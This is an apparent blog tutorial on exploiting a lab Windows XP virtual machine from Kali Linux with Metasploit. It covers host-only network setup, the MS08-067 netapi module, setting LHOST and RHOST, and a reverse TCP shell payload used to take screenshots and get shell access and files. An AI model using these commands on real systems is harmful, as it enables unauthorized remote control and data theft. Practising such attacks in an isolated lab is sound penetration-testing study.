How to Exploit Windows XP Using Metasploit

Before exploiting the system, we must know which vulnerabilities in the system that we want to exploit. Metasploit makes it easy for pentester to find, exploit, and validate the vulnerabilities. So, in this post, I’m going to exploit Windows XP from my Kali Linux with a host-only network connection using Metasploit.

First, we need to set up routing between two host-only networks.
To do that, click Settings in VM menu (shown in the picture below)

Then, choose Host-only as your network connection.

After you click OK, go to your Windows XP in Kali Linux and click VM in the Settings option again, but this time you choose custom and target it to your host-only virtual network.

Then, I want to set a new IP address in my Kali Linux that will be used later as my local host or LHOST. Type sudo ifconfig eth0:0 (or any other name for your interface card) <your desired IP address> netmask <your desired netmask> in your terminal. To test if the connection between both networks js already established, we can test that by ping the other computer. If it replies with 0% packet loss, then the connection has successfully set up.

pinging the Windows XP’s IP address from my Kali Linux

pinging the Kali Linux’s IP address from my Windows XP

If you do not know your Windows XP’s IP address, check it by typing ipconfig in your command prompt.

Now that I have already established the connection between two host-only networks. We can start preparing for the exploitation step.

First thing first, let’s start the Metasploit application by typing msfconsole in your Terminal.

Metasploit’s interface

Metasploit offers more than 1500 exploits package that we can use on different targets. To check what are the existing exploits you can type show exploits and the list of exploits with their descriptions will show up. Metasploit also updates and keep adding more packages from time to time so make sure you update the app regularly.

List of exploits if you type ‘show exploits

In this post, I am going to utilize the Microsoft Service Relative Path Stack Corruption vulnerability in Windows XP or better knows as netapi as my entrance. Type use windows/smb/ms08_067_netapi.

The next thing to do is to set up the LHOST (Local Host) and RHOST (Remote Host). In this case, Kali Linux is the local host and Windows XP is the remote host.

We can check whether the RHOST and LHOST have been set up by typing show optionsIn this picture, I haven’t set up anything since the RHOST is still empty.

In order to set the RHOST & LHOST, type set RHOST/LHOST <IP address>

Setting up the IP addresses for RHOST and LHOST

Now, the only thing to do is to start the exploitation process by typing the exploit command.

Now you might be wondering what all the things that we can do at this step. You can find out all that with help command, it will show you the list of stuff that we can execute.

To check if this is the right target that I want to exploit, I tried to execute the screenshot command. The screenshot command will capture the screen of the target at the very exact moment.

my Windows XP’s screen

Executing the screenshot command

My root folder where the image is saved

Here’s the screenshot picture from Metasploit

There are still so many things that we can do other than screenshot the target’s screen. But, during a penetration testing, our goal is to get a shell access so that we can get the full control of the computer.

In this netapi vulnerability, we can execute shell command to get the shell access. 

Or you can set the payload first before you exploit the target, by typing set PAYLOAD windows/shell/reverse_tcpPAYLOAD => windows/shell/reverse_tcp

We get the shell access directly <3

Now that we got the shell access, we can do just about anything with the computer, for example, get some important file from the target’s computer.